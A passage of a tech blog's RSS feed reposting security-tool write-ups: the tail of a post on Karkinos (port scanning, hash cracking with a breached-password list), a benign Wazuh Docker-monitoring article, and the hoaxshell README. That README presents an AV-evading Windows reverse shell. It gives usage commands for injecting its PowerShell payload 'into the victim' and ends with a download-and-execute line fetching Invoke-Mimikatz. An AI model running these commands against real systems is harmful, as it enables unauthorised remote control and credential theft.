<p><a href="https://hakin9.org/wp-content/uploads/2020/12/busting1.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-232595" src="https://hakin9.org/wp-content/uploads/2020/12/busting1.png" sizes="auto, (max-width: 1774px) 100vw, 1774px" srcset="https://hakin9.org/wp-content/uploads/2020/12/busting1.png 1774w, https://hakin9.org/wp-content/uploads/2020/12/busting1-378x191.png 378w, https://hakin9.org/wp-content/uploads/2020/12/busting1-565x286.png 565w, https://hakin9.org/wp-content/uploads/2020/12/busting1-460x233.png 460w, https://hakin9.org/wp-content/uploads/2020/12/busting1-1024x518.png 1024w, https://hakin9.org/wp-content/uploads/2020/12/busting1-768x389.png 768w, https://hakin9.org/wp-content/uploads/2020/12/busting1-1536x778.png 1536w, https://hakin9.org/wp-content/uploads/2020/12/busting1-500x253.png 500w, https://hakin9.org/wp-content/uploads/2020/12/busting1-200x101.png 200w, https://hakin9.org/wp-content/uploads/2020/12/busting1-120x61.png 120w, https://hakin9.org/wp-content/uploads/2020/12/busting1-310x157.png 310w" alt="" width="1774" height="898" /></a></p>
<h3 dir="auto"><strong>Configure it</strong></h3>
<p><a href="https://hakin9.org/wp-content/uploads/2020/12/busting2.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-232596" src="https://hakin9.org/wp-content/uploads/2020/12/busting2.png" sizes="auto, (max-width: 1880px) 100vw, 1880px" srcset="https://hakin9.org/wp-content/uploads/2020/12/busting2.png 1880w, https://hakin9.org/wp-content/uploads/2020/12/busting2-378x165.png 378w, https://hakin9.org/wp-content/uploads/2020/12/busting2-565x246.png 565w, https://hakin9.org/wp-content/uploads/2020/12/busting2-460x200.png 460w, https://hakin9.org/wp-content/uploads/2020/12/busting2-1024x446.png 1024w, https://hakin9.org/wp-content/uploads/2020/12/busting2-768x335.png 768w, https://hakin9.org/wp-content/uploads/2020/12/busting2-1536x669.png 1536w, https://hakin9.org/wp-content/uploads/2020/12/busting2-500x218.png 500w, https://hakin9.org/wp-content/uploads/2020/12/busting2-200x87.png 200w, https://hakin9.org/wp-content/uploads/2020/12/busting2-120x52.png 120w, https://hakin9.org/wp-content/uploads/2020/12/busting2-310x135.png 310w" alt="" width="1880" height="819" /></a></p>
<h3 dir="auto"><strong>Start scanning</strong></h3>
<p><a href="https://hakin9.org/wp-content/uploads/2020/12/busting3.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-232597" src="https://hakin9.org/wp-content/uploads/2020/12/busting3.png" sizes="auto, (max-width: 1859px) 100vw, 1859px" srcset="https://hakin9.org/wp-content/uploads/2020/12/busting3.png 1859w, https://hakin9.org/wp-content/uploads/2020/12/busting3-378x179.png 378w, https://hakin9.org/wp-content/uploads/2020/12/busting3-565x267.png 565w, https://hakin9.org/wp-content/uploads/2020/12/busting3-460x218.png 460w, https://hakin9.org/wp-content/uploads/2020/12/busting3-1024x484.png 1024w, https://hakin9.org/wp-content/uploads/2020/12/busting3-768x363.png 768w, https://hakin9.org/wp-content/uploads/2020/12/busting3-1536x726.png 1536w, https://hakin9.org/wp-content/uploads/2020/12/busting3-500x236.png 500w, https://hakin9.org/wp-content/uploads/2020/12/busting3-200x95.png 200w, https://hakin9.org/wp-content/uploads/2020/12/busting3-120x57.png 120w, https://hakin9.org/wp-content/uploads/2020/12/busting3-310x147.png 310w" alt="" width="1859" height="879" /></a></p>
<h3 dir="auto"><strong>Full Directory and File Busting demo:</strong></h3>
<div class="fluid-width-video-wrapper"><iframe src="https://www.youtube.com/embed/cS9j9FXs6bE?modestbranding=1" name="fitvid1" allowfullscreen="allowfullscreen" data-mce-fragment="1"></iframe></div>
<h2 dir="auto"><strong>Port Scanning</strong></h2>
<h3 dir="auto"><a id="user-content-launch-the-scanner" class="anchor" href="https://github.com/helich0pper/Karkinos#launch-the-scanner" target="_blank" rel="noopener" aria-hidden="true"></a><strong>Launch the scanner</strong></h3>
<p><a href="https://hakin9.org/wp-content/uploads/2020/12/portscanning1.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-232598" src="https://hakin9.org/wp-content/uploads/2020/12/portscanning1.png" sizes="auto, (max-width: 1576px) 100vw, 1576px" srcset="https://hakin9.org/wp-content/uploads/2020/12/portscanning1.png 1576w, https://hakin9.org/wp-content/uploads/2020/12/portscanning1-378x177.png 378w, https://hakin9.org/wp-content/uploads/2020/12/portscanning1-565x265.png 565w, https://hakin9.org/wp-content/uploads/2020/12/portscanning1-460x216.png 460w, https://hakin9.org/wp-content/uploads/2020/12/portscanning1-1024x480.png 1024w, https://hakin9.org/wp-content/uploads/2020/12/portscanning1-768x360.png 768w, https://hakin9.org/wp-content/uploads/2020/12/portscanning1-1536x720.png 1536w, https://hakin9.org/wp-content/uploads/2020/12/portscanning1-500x234.png 500w, https://hakin9.org/wp-content/uploads/2020/12/portscanning1-200x94.png 200w, https://hakin9.org/wp-content/uploads/2020/12/portscanning1-120x56.png 120w, https://hakin9.org/wp-content/uploads/2020/12/portscanning1-310x145.png 310w" alt="" width="1576" height="739" /></a></p>
<h3 dir="auto"><strong>Configure it</strong></h3>
<p><a href="https://hakin9.org/wp-content/uploads/2020/12/portscanning2.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-232599" src="https://hakin9.org/wp-content/uploads/2020/12/portscanning2.png" sizes="auto, (max-width: 1802px) 100vw, 1802px" srcset="https://hakin9.org/wp-content/uploads/2020/12/portscanning2.png 1802w, https://hakin9.org/wp-content/uploads/2020/12/portscanning2-378x144.png 378w, https://hakin9.org/wp-content/uploads/2020/12/portscanning2-565x215.png 565w, https://hakin9.org/wp-content/uploads/2020/12/portscanning2-460x175.png 460w, https://hakin9.org/wp-content/uploads/2020/12/portscanning2-1024x390.png 1024w, https://hakin9.org/wp-content/uploads/2020/12/portscanning2-768x292.png 768w, https://hakin9.org/wp-content/uploads/2020/12/portscanning2-1536x585.png 1536w, https://hakin9.org/wp-content/uploads/2020/12/portscanning2-500x190.png 500w, https://hakin9.org/wp-content/uploads/2020/12/portscanning2-200x76.png 200w, https://hakin9.org/wp-content/uploads/2020/12/portscanning2-120x46.png 120w, https://hakin9.org/wp-content/uploads/2020/12/portscanning2-310x118.png 310w" alt="" width="1802" height="686" /></a></p>
<h3 dir="auto"><strong>Start scanning</strong></h3>
<p><a href="https://hakin9.org/wp-content/uploads/2020/12/portscanning3.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-232600" src="https://hakin9.org/wp-content/uploads/2020/12/portscanning3.png" sizes="auto, (max-width: 1801px) 100vw, 1801px" srcset="https://hakin9.org/wp-content/uploads/2020/12/portscanning3.png 1801w, https://hakin9.org/wp-content/uploads/2020/12/portscanning3-378x152.png 378w, https://hakin9.org/wp-content/uploads/2020/12/portscanning3-565x227.png 565w, https://hakin9.org/wp-content/uploads/2020/12/portscanning3-460x184.png 460w, https://hakin9.org/wp-content/uploads/2020/12/portscanning3-1024x411.png 1024w, https://hakin9.org/wp-content/uploads/2020/12/portscanning3-768x308.png 768w, https://hakin9.org/wp-content/uploads/2020/12/portscanning3-1536x616.png 1536w, https://hakin9.org/wp-content/uploads/2020/12/portscanning3-500x200.png 500w, https://hakin9.org/wp-content/uploads/2020/12/portscanning3-200x80.png 200w, https://hakin9.org/wp-content/uploads/2020/12/portscanning3-120x48.png 120w, https://hakin9.org/wp-content/uploads/2020/12/portscanning3-310x124.png 310w" alt="" width="1801" height="722" /></a></p>
<h3 dir="auto"><strong>Full Port Scanning Demo</strong>:</h3>
<div class="fluid-width-video-wrapper"><iframe src="https://www.youtube.com/embed/FybH4s_FyNA" name="fitvid2" allowfullscreen="allowfullscreen" data-mce-fragment="1"></iframe></div>
<h2><strong>Generating Hashes</strong></h2>
<p>Karkinos can generate commonly used hashes such as:</p>
<ul>
<li>MD5</li>
<li>SHA1</li>
<li>SHA256</li>
<li>SHA512</li>
</ul>
<p><a href="https://hakin9.org/wp-content/uploads/2020/12/convert.png"><img loading="lazy" decoding="async" class="alignnone wp-image-192706" src="https://hakin9.org/wp-content/uploads/2020/12/convert.png" sizes="auto, (max-width: 882px) 100vw, 882px" srcset="https://hakin9.org/wp-content/uploads/2020/12/convert.png 1446w, https://hakin9.org/wp-content/uploads/2020/12/convert-378x221.png 378w, https://hakin9.org/wp-content/uploads/2020/12/convert-565x330.png 565w, https://hakin9.org/wp-content/uploads/2020/12/convert-460x269.png 460w, https://hakin9.org/wp-content/uploads/2020/12/convert-1024x598.png 1024w, https://hakin9.org/wp-content/uploads/2020/12/convert-768x449.png 768w, https://hakin9.org/wp-content/uploads/2020/12/convert-500x292.png 500w, https://hakin9.org/wp-content/uploads/2020/12/convert-200x117.png 200w, https://hakin9.org/wp-content/uploads/2020/12/convert-120x70.png 120w, https://hakin9.org/wp-content/uploads/2020/12/convert-310x181.png 310w" alt="" width="882" height="515" /></a></p>
<h2><strong>Cracking Hashes</strong></h2>
<p>Karkinos offers the option to <strong>simultaneously</strong> crack hashes using a built-in wordlist consisting of over 15 million common and breached passwords. This list can easily be modified and/or completely replaced.</p>
<p><a href="https://hakin9.org/wp-content/uploads/2020/12/crack.png"><img loading="lazy" decoding="async" class="alignnone wp-image-192728" src="https://hakin9.org/wp-content/uploads/2020/12/crack.png" sizes="auto, (max-width: 902px) 100vw, 902px" srcset="https://hakin9.org/wp-content/uploads/2020/12/crack.png 1449w, https://hakin9.org/wp-content/uploads/2020/12/crack-378x237.png 378w, https://hakin9.org/wp-content/uploads/2020/12/crack-565x354.png 565w, https://hakin9.org/wp-content/uploads/2020/12/crack-460x288.png 460w, https://hakin9.org/wp-content/uploads/2020/12/crack-1024x641.png 1024w, https://hakin9.org/wp-content/uploads/2020/12/crack-768x481.png 768w, https://hakin9.org/wp-content/uploads/2020/12/crack-500x313.png 500w, https://hakin9.org/wp-content/uploads/2020/12/crack-200x125.png 200w, https://hakin9.org/wp-content/uploads/2020/12/crack-120x75.png 120w, https://hakin9.org/wp-content/uploads/2020/12/crack-310x194.png 310w" alt="" width="902" height="565" /></a></p>
<p>The post <a href="http://kostacipo.stream/karkinos-penetration-testing-and-hacking-ctfs-swiss-army-knife/">Karkinos &#8211; Penetration Testing and Hacking CTF&#8217;s Swiss Army Knife</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>http://kostacipo.stream/karkinos-penetration-testing-and-hacking-ctfs-swiss-army-knife/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Using Wazuh for Docker Container Monitoring</title>
		<link>http://kostacipo.stream/using-wazuh-for-docker-container-monitoring/</link>
					<comments>http://kostacipo.stream/using-wazuh-for-docker-container-monitoring/#respond</comments>
		
		<dc:creator><![CDATA[Majordomo]]></dc:creator>
		<pubDate>Mon, 23 Jan 2023 19:20:11 +0000</pubDate>
				<category><![CDATA[DevOps]]></category>
		<category><![CDATA[General]]></category>
		<category><![CDATA[Tools]]></category>
		<category><![CDATA[container monitoring]]></category>
		<category><![CDATA[docker]]></category>
		<guid isPermaLink="false">https://kostacipo.stream/?p=2142</guid>

					<description><![CDATA[<p>In the last few years, container utilization to build, share, and run applications has grown significantly. This growth comes from the fact that containers give developers the ability to package application code and all its dependencies. Also, with containers, users can gain an extra layer of security thanks to the isolation capabilities it provides. The [&#8230;]</p>
<p>The post <a href="http://kostacipo.stream/using-wazuh-for-docker-container-monitoring/">Using Wazuh for Docker Container Monitoring</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>In the last few years, container utilization to build, share, and run applications has grown significantly. This growth comes from the fact that containers give developers the ability to package application code and all its dependencies. Also, with containers, users can gain an extra layer of security thanks to the isolation capabilities it provides. The introduction of Docker containers has paved the way for many organizations to easily host applications within containers. Docker containers are standardized, lightweight, and secure runtime instances of a Docker image.</p>
<p>Containers out-of-the-box do not provide security monitoring. Therefore, it is important to have a comprehensive view of what is happening in runtime. This ensures that containers operate smoothly without security issues that can easily affect other containers and the entire infrastructure. Some security aspects to continuously watch out for when running Docker containers are:</p>
<ul>
<li aria-level="1"><b>Container management: </b>Docker container management involves supervising actions performed on a container to keep it running smoothly. Threat actors can get hold of containers and perform malicious activities such as viewing critical content, opening ports, creating, stopping or even destroying containers. Ability to distinguish unusual Docker events can be challenging. Observing these actions in near real-time as they occur can help organizations running Docker containers make better informed decisions.</li>
</ul>
<ul>
<li aria-level="1"><b>Container resource consumption: </b>Monitoring the performance of a container provides insight into its resource utilization. Some core resources include CPU, memory, disk, and network traffic. With resource monitoring, organizations can track container resource consumption and set measures to increase efficiency. These actions prevent imbalances of container resources in Dockerized infrastructures. Additionally, it allows better visibility of infrastructures in the event of a security incident.</li>
</ul>
<ul>
<li aria-level="1"><b>Container health: </b>Container health checks aid an organization in knowing its workload availability. The health status of a container is different from its actual state of operation. For example, a container can run while a web server running in the container may be down and unable to handle requests. This can be due to an attack that, if not monitored, can persist and cause damage to an organization. Monitoring the health status of a container helps to reduce an attack surface and prevent anomalies in the container.</li>
</ul>
<p>Organizations need to identify and resolve threats quickly and proactively to avoid risks of compromise. For this, keeping track of the above criteria is indispensable and can be accomplished through the use of security monitoring solutions.</p>
<h1>Using Wazuh for container monitoring</h1>
<p><a href="https://wazuh.com/" target="_blank" rel="noopener">Wazuh</a> is an open source security platform with unified XDR and SIEM capabilities. Its architecture comprises the Wazuh central components (server, indexer, and dashboard) and a universal agent. The solution provides protection for devices in clouds and on-premises infrastructures. Wazuh has many features ranging from container monitoring, file integrity monitoring, vulnerability detection, security configuration assessment, and more. Wazuh is multi-platform and expands its flexibility through integration with other security solutions.</p>
<p>Figure 1 below shows an example of real-time monitoring of Docker containers using Wazuh.</p>
<p style="text-align: center;"><a href="https://hakin9.org/wp-content/uploads/2022/11/Figure-1-1.png"><img loading="lazy" decoding="async" class="wp-image-245480 aligncenter" src="https://hakin9.org/wp-content/uploads/2022/11/Figure-1-1.png" sizes="auto, (max-width: 991px) 100vw, 991px" srcset="https://hakin9.org/wp-content/uploads/2022/11/Figure-1-1.png 1257w, https://hakin9.org/wp-content/uploads/2022/11/Figure-1-1-460x295.png 460w, https://hakin9.org/wp-content/uploads/2022/11/Figure-1-1-1024x657.png 1024w, https://hakin9.org/wp-content/uploads/2022/11/Figure-1-1-768x493.png 768w, https://hakin9.org/wp-content/uploads/2022/11/Figure-1-1-500x321.png 500w, https://hakin9.org/wp-content/uploads/2022/11/Figure-1-1-200x128.png 200w, https://hakin9.org/wp-content/uploads/2022/11/Figure-1-1-378x243.png 378w, https://hakin9.org/wp-content/uploads/2022/11/Figure-1-1-565x363.png 565w, https://hakin9.org/wp-content/uploads/2022/11/Figure-1-1-120x77.png 120w, https://hakin9.org/wp-content/uploads/2022/11/Figure-1-1-310x199.png 310w" alt="" width="991" height="637" /></a><em>Figure 1: Real-time monitoring of Docker containers using Wazuh</em></p>
<p>For the use cases below, the Wazuh agent is installed on endpoints running Docker containers. The agent collects security and runtime data from the containers and forwards it to the Wazuh server for log analysis, correlation, and alerting.</p>
<h2>Monitoring container events</h2>
<p>Wazuh has a Docker module that communicates with the Docker Engine API to gather information on Docker containers. The only configuration necessary is to enable the Docker listener module to allow us to monitor Docker events. The Wazuh dashboard in Figure 2 below shows an example of detected container events in a Docker environment.</p>
<p style="text-align: center;"><a href="https://hakin9.org/wp-content/uploads/2022/11/Figure-2.jpg"><img loading="lazy" decoding="async" class="wp-image-245477 aligncenter" src="https://hakin9.org/wp-content/uploads/2022/11/Figure-2.jpg" sizes="auto, (max-width: 992px) 100vw, 992px" srcset="https://hakin9.org/wp-content/uploads/2022/11/Figure-2.jpg 1910w, https://hakin9.org/wp-content/uploads/2022/11/Figure-2-460x197-1.jpg 460w, https://hakin9.org/wp-content/uploads/2022/11/Figure-2-1024x440-1.jpg 1024w, https://hakin9.org/wp-content/uploads/2022/11/Figure-2-768x330.png 768w, https://hakin9.org/wp-content/uploads/2022/11/Figure-2-1536x659-1.jpg 1536w, https://hakin9.org/wp-content/uploads/2022/11/Figure-2-500x215-1.jpg 500w, https://hakin9.org/wp-content/uploads/2022/11/Figure-2-200x86-1.jpg 200w, https://hakin9.org/wp-content/uploads/2022/11/Figure-2-378x162.png 378w, https://hakin9.org/wp-content/uploads/2022/11/Figure-2-565x243.png 565w, https://hakin9.org/wp-content/uploads/2022/11/Figure-2-120x52-1.jpg 120w, https://hakin9.org/wp-content/uploads/2022/11/Figure-2-310x133-1.jpg 310w" alt="" width="992" height="426" /></a><em>Figure 2: Docker events detected in a Docker environment</em></p>
<h2>Monitoring container resource utilization</h2>
<p>Wazuh can be used to monitor the performance of Docker containers in an endpoint.  The Wazuh command monitoring module allows you to monitor the output of specific commands and trigger alerts accordingly. This gives organizations a clear view of the container for abnormal activities. The Wazuh dashboard in Figure 3 below shows the CPU, memory, and network traffic consumption of containers in an endpoint.</p>
<p style="text-align: center;"><a href="https://hakin9.org/wp-content/uploads/2022/11/Figure-3.png"><img loading="lazy" decoding="async" class=" wp-image-245478 aligncenter" src="https://hakin9.org/wp-content/uploads/2022/11/Figure-3.png" sizes="auto, (max-width: 991px) 100vw, 991px" srcset="https://hakin9.org/wp-content/uploads/2022/11/Figure-3.png 1904w, https://hakin9.org/wp-content/uploads/2022/11/Figure-3-460x150.png 460w, https://hakin9.org/wp-content/uploads/2022/11/Figure-3-1024x335.png 1024w, https://hakin9.org/wp-content/uploads/2022/11/Figure-3-768x251.png 768w, https://hakin9.org/wp-content/uploads/2022/11/Figure-3-1536x502.png 1536w, https://hakin9.org/wp-content/uploads/2022/11/Figure-3-500x163.png 500w, https://hakin9.org/wp-content/uploads/2022/11/Figure-3-200x65.png 200w, https://hakin9.org/wp-content/uploads/2022/11/Figure-3-378x123.png 378w, https://hakin9.org/wp-content/uploads/2022/11/Figure-3-565x185.png 565w, https://hakin9.org/wp-content/uploads/2022/11/Figure-3-120x39.png 120w, https://hakin9.org/wp-content/uploads/2022/11/Figure-3-310x101.png 310w" alt="" width="991" height="324" /></a><em>Figure 3: Resource consumption of containers in a Docker environment</em></p>
<h2>Monitoring container health</h2>
<p>The Wazuh command monitoring module is used to monitor the health status of containers in Dockerized environments. Figure 4 below shows the health status of containers running on an endpoint.</p>
<p style="text-align: center;"><a href="https://hakin9.org/wp-content/uploads/2022/11/Figure-4.png"><img loading="lazy" decoding="async" class=" wp-image-245479 aligncenter" src="https://hakin9.org/wp-content/uploads/2022/11/Figure-4.png" sizes="auto, (max-width: 992px) 100vw, 992px" srcset="https://hakin9.org/wp-content/uploads/2022/11/Figure-4.png 1910w, https://hakin9.org/wp-content/uploads/2022/11/Figure-4-460x154.png 460w, https://hakin9.org/wp-content/uploads/2022/11/Figure-4-1024x344.png 1024w, https://hakin9.org/wp-content/uploads/2022/11/Figure-4-768x258.png 768w, https://hakin9.org/wp-content/uploads/2022/11/Figure-4-1536x515.png 1536w, https://hakin9.org/wp-content/uploads/2022/11/Figure-4-500x168.png 500w, https://hakin9.org/wp-content/uploads/2022/11/Figure-4-200x67.png 200w, https://hakin9.org/wp-content/uploads/2022/11/Figure-4-378x127.png 378w, https://hakin9.org/wp-content/uploads/2022/11/Figure-4-565x190.png 565w, https://hakin9.org/wp-content/uploads/2022/11/Figure-4-120x40.png 120w, https://hakin9.org/wp-content/uploads/2022/11/Figure-4-310x104.png 310w" alt="" width="992" height="333" /></a><em>Figure 4: Health status of containers in a Docker environment</em></p>
<h1>Conclusion</h1>
<p>Robust monitoring and easy debugging are key factors for container security. This ensures complete coverage of metrics and the events happening in your Dockerized container infrastructures. We have seen how Wazuh facilitates and improves an organization&#8217;s visibility through its container security monitoring capabilities. Visit this <a href="https://documentation.wazuh.com/current/container-security/index.html" target="_blank" rel="noopener">documentation</a> to get a detailed explanation of how to perform container monitoring with Wazuh.</p>
<p>Wazuh is free to use, easy to deploy, and has a continuously growing <a href="https://wazuh.com/community/" target="_blank" rel="noopener">community</a> that supports thousands of users. To get started with Wazuh, visit the <a href="https://documentation.wazuh.com/current/quickstart.html" target="_blank" rel="noopener">Quickstart installation guide</a> and explore the features it provides.</p>
<p>The post <a href="http://kostacipo.stream/using-wazuh-for-docker-container-monitoring/">Using Wazuh for Docker Container Monitoring</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>http://kostacipo.stream/using-wazuh-for-docker-container-monitoring/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>hoaxshell &#8211; An unconventional Windows reverse shell</title>
		<link>http://kostacipo.stream/hoaxshell-an-unconventional-windows-reverse-shell/</link>
					<comments>http://kostacipo.stream/hoaxshell-an-unconventional-windows-reverse-shell/#respond</comments>
		
		<dc:creator><![CDATA[Majordomo]]></dc:creator>
		<pubDate>Mon, 23 Jan 2023 19:15:12 +0000</pubDate>
				<category><![CDATA[Hacks]]></category>
		<category><![CDATA[Tools]]></category>
		<category><![CDATA[Windows]]></category>
		<category><![CDATA[reverse shell]]></category>
		<category><![CDATA[windows]]></category>
		<guid isPermaLink="false">https://kostacipo.stream/?p=2139</guid>

					<description><![CDATA[<p>Currently undetected by Microsoft Defender and various other AV solutions, solely based on http(s) traffic. Purpose hoaxshell is an unconventional Windows reverse shell, currently undetected by Microsoft Defender and possibly other AV solutions as it is solely based on http(s) traffic. The tool is easy to use, it generates its own PowerShell payload and it [&#8230;]</p>
<p>The post <a href="http://kostacipo.stream/hoaxshell-an-unconventional-windows-reverse-shell/">hoaxshell &#8211; An unconventional Windows reverse shell</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></description>
										<content:encoded><![CDATA[<h3>Currently undetected by Microsoft Defender and various other AV solutions, solely based on http(s) traffic.</h3>
<h2 dir="auto"><strong>Purpose</strong></h2>
<p dir="auto">hoaxshell is an unconventional Windows reverse shell, currently undetected by Microsoft Defender and possibly other AV solutions as it is solely based on http(s) traffic. The tool is easy to use, it generates its own PowerShell payload and it supports encryption (ssl).</p>
<p dir="auto">So far, it has been tested on fully updated <strong>Windows 11 Enterprise</strong> and <strong>Windows 10 Pro</strong> boxes (see video and screenshots).</p>
<p dir="auto">More: <a href="https://github.com/t3l3machus/hoaxshell" target="_blank" rel="noopener">https://github.com/t3l3machus/hoaxshell</a></p>
<h3 dir="auto"><a id="user-content-video-presentation" class="anchor" href="https://github.com/t3l3machus/hoaxshell#video-presentation" target="_blank" rel="noopener" aria-hidden="true"></a><strong>Video Presentation</strong></h3>
<p dir="auto"><iframe loading="lazy" src="//www.youtube.com/embed/SEufgD5UxdU" width="560" height="314" allowfullscreen="allowfullscreen"></iframe></p>
<h2 dir="auto"><a id="user-content-screenshots" class="anchor" href="https://github.com/t3l3machus/hoaxshell#screenshots" target="_blank" rel="noopener" aria-hidden="true"></a><strong>Screenshots </strong></h2>
<p><a href="https://hakin9.org/wp-content/uploads/2022/08/68747470733a2f2f7261772e6769746875622e636f6d2f74336c336d61636875732f686f61787368656c6c2f6d61737465722f73637265656e73686f74732f686f61787368656c6c2d77696e31312d76322e706e67.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-242868" src="https://hakin9.org/wp-content/uploads/2022/08/68747470733a2f2f7261772e6769746875622e636f6d2f74336c336d61636875732f686f61787368656c6c2f6d61737465722f73637265656e73686f74732f686f61787368656c6c2d77696e31312d76322e706e67.png" sizes="auto, (max-width: 841px) 100vw, 841px" srcset="https://hakin9.org/wp-content/uploads/2022/08/68747470733a2f2f7261772e6769746875622e636f6d2f74336c336d61636875732f686f61787368656c6c2f6d61737465722f73637265656e73686f74732f686f61787368656c6c2d77696e31312d76322e706e67.png 841w, https://hakin9.org/wp-content/uploads/2022/08/68747470733a2f2f7261772e6769746875622e636f6d2f74336c336d61636875732f686f61787368656c6c2f6d61737465722f73637265656e73686f74732f686f61787368656c6c2d77696e31312d76322e706e67-460x418.png 460w, https://hakin9.org/wp-content/uploads/2022/08/68747470733a2f2f7261772e6769746875622e636f6d2f74336c336d61636875732f686f61787368656c6c2f6d61737465722f73637265656e73686f74732f686f61787368656c6c2d77696e31312d76322e706e67-768x698.png 768w, https://hakin9.org/wp-content/uploads/2022/08/68747470733a2f2f7261772e6769746875622e636f6d2f74336c336d61636875732f686f61787368656c6c2f6d61737465722f73637265656e73686f74732f686f61787368656c6c2d77696e31312d76322e706e67-500x454.png 500w, https://hakin9.org/wp-content/uploads/2022/08/68747470733a2f2f7261772e6769746875622e636f6d2f74336c336d61636875732f686f61787368656c6c2f6d61737465722f73637265656e73686f74732f686f61787368656c6c2d77696e31312d76322e706e67-200x182.png 200w, https://hakin9.org/wp-content/uploads/2022/08/68747470733a2f2f7261772e6769746875622e636f6d2f74336c336d61636875732f686f61787368656c6c2f6d61737465722f73637265656e73686f74732f686f61787368656c6c2d77696e31312d76322e706e67-378x343.png 378w, https://hakin9.org/wp-content/uploads/2022/08/68747470733a2f2f7261772e6769746875622e636f6d2f74336c336d61636875732f686f61787368656c6c2f6d61737465722f73637265656e73686f74732f686f61787368656c6c2d77696e31312d76322e706e67-565x513.png 565w, https://hakin9.org/wp-content/uploads/2022/08/68747470733a2f2f7261772e6769746875622e636f6d2f74336c336d61636875732f686f61787368656c6c2f6d61737465722f73637265656e73686f74732f686f61787368656c6c2d77696e31312d76322e706e67-120x109.png 120w, https://hakin9.org/wp-content/uploads/2022/08/68747470733a2f2f7261772e6769746875622e636f6d2f74336c336d61636875732f686f61787368656c6c2f6d61737465722f73637265656e73686f74732f686f61787368656c6c2d77696e31312d76322e706e67-310x282.png 310w" alt="" width="841" height="764" /></a></p>
<p dir="auto">Find more screenshots <a href="https://github.com/t3l3machus/hoaxshell/blob/main/screenshots" target="_blank" rel="noopener">here</a>.</p>
<h2 dir="auto"><a id="user-content-installation" class="anchor" href="https://github.com/t3l3machus/hoaxshell#installation" target="_blank" rel="noopener" aria-hidden="true"></a><strong>Installation</strong></h2>
<div class="snippet-clipboard-content notranslate position-relative overflow-auto">
<pre class="notranslate"><code>git clone https://github.com/t3l3machus/hoaxshell
cd ./hoaxshell
sudo pip3 install -r requirements.txt
chmod +x hoaxshell.py
</code></pre>
<h2 dir="auto"><a id="user-content-usage" class="anchor" href="https://github.com/t3l3machus/hoaxshell#usage" target="_blank" rel="noopener" aria-hidden="true"></a><strong>Usage</strong></h2>
<p dir="auto"><strong>Important</strong>: As a means of avoiding detection, hoaxshell is automatically generating random values for the session id, URL paths and name of a custom HTTP header utilized in the process, every time the script is started. The generated payload will work only for the instance it was generated for. Use the <code>-g</code> option to bypass this behavior and re-establish an active session or reuse a past generated payload with a new instance of hoaxshell.</p>
<h3 dir="auto"><a id="user-content-basic-shell-session-over-http" class="anchor" href="https://github.com/t3l3machus/hoaxshell#basic-shell-session-over-http" target="_blank" rel="noopener" aria-hidden="true"></a><strong>Basic shell session over HTTP</strong></h3>
<div class="snippet-clipboard-content notranslate position-relative overflow-auto">
<pre class="notranslate"><code>sudo python3 hoaxshell.py -s &lt;your_ip&gt;
</code></pre>
<p dir="auto">When you run hoaxshell, it will generate its own PowerShell payload for you to copy and inject into the victim. By default, the payload is base64 encoded for convenience. If you need the payload raw, execute the &#8220;rawpayload&#8221; prompt command or start hoaxshell with the <code>-r</code> argument. After the payload has been executed on the victim, you&#8217;ll be able to run PowerShell commands against it.</p>
<h3 dir="auto"><a id="user-content-encrypted-shell-session-https" class="anchor" href="https://github.com/t3l3machus/hoaxshell#encrypted-shell-session-https" target="_blank" rel="noopener" aria-hidden="true"></a>Encrypted shell session (HTTPS):</h3>
<div class="snippet-clipboard-content notranslate position-relative overflow-auto">
<pre class="notranslate"><code># Generate self-signed certificate:
openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365

# Pass the cert.pem and key.pem as arguments:
sudo python3 hoaxshell.py -s &lt;your_ip&gt; -c &lt;/path/to/cert.pem&gt; -k &lt;path/to/key.pem&gt;

</code></pre>
<p dir="auto">The generated PowerShell payload will be longer in length because of an additional block of code that disables the SSL certificate validation.</p>
<h3 dir="auto"><a id="user-content-grab-session-mode" class="anchor" href="https://github.com/t3l3machus/hoaxshell#grab-session-mode" target="_blank" rel="noopener" aria-hidden="true"></a><strong>Grab session mode</strong></h3>
<p dir="auto">In case you close your terminal accidentally, have a power outage or something, you can start hoaxshell in grab session mode, it will attempt to re-establish a session, given that the payload is still running on the victim machine.</p>
<div class="snippet-clipboard-content notranslate position-relative overflow-auto">
<pre class="notranslate"><code>sudo python3 hoaxshell.py -s &lt;your_ip&gt; -g
</code></pre>
<p dir="auto"><strong>Important</strong>: Make sure to start hoaxshell with the same settings as the session you are trying to restore (HTTP/HTTPS, port, etc).</p>
<h2 dir="auto"><a id="user-content-limitations" class="anchor" href="https://github.com/t3l3machus/hoaxshell#limitations" target="_blank" rel="noopener" aria-hidden="true"></a><strong>Limitations</strong></h2>
<p dir="auto">The shell is going to hang if you execute a command that initiates an interactive session. Example:</p>
<div class="snippet-clipboard-content notranslate position-relative overflow-auto">
<pre class="notranslate"><code># this command will execute succesfully and you will have no problem: 
&gt; powershell echo 'This is a test'

# But this one will open an interactive session within the hoaxshell session and is going to cause the shell to hang:
&gt; powershell

# In the same manner, you won't have a problem executing this:
&gt; cmd /c dir /a

# But this will cause your hoaxshell to hang:
&gt; cmd.exe
</code></pre>
<p dir="auto">So, if you for example would like to run mimikatz through hoaxshell you would need to invoke the commands:</p>
<div class="snippet-clipboard-content notranslate position-relative overflow-auto">
<pre class="notranslate"><code>hoaxshell &gt; IEX(New-Object Net.WebClient).DownloadString('http://192.168.0.13:4443/Invoke-Mimikatz.ps1');Invoke-Mimikatz -Command '"PRIVILEGE::Debug"'
</code></pre>
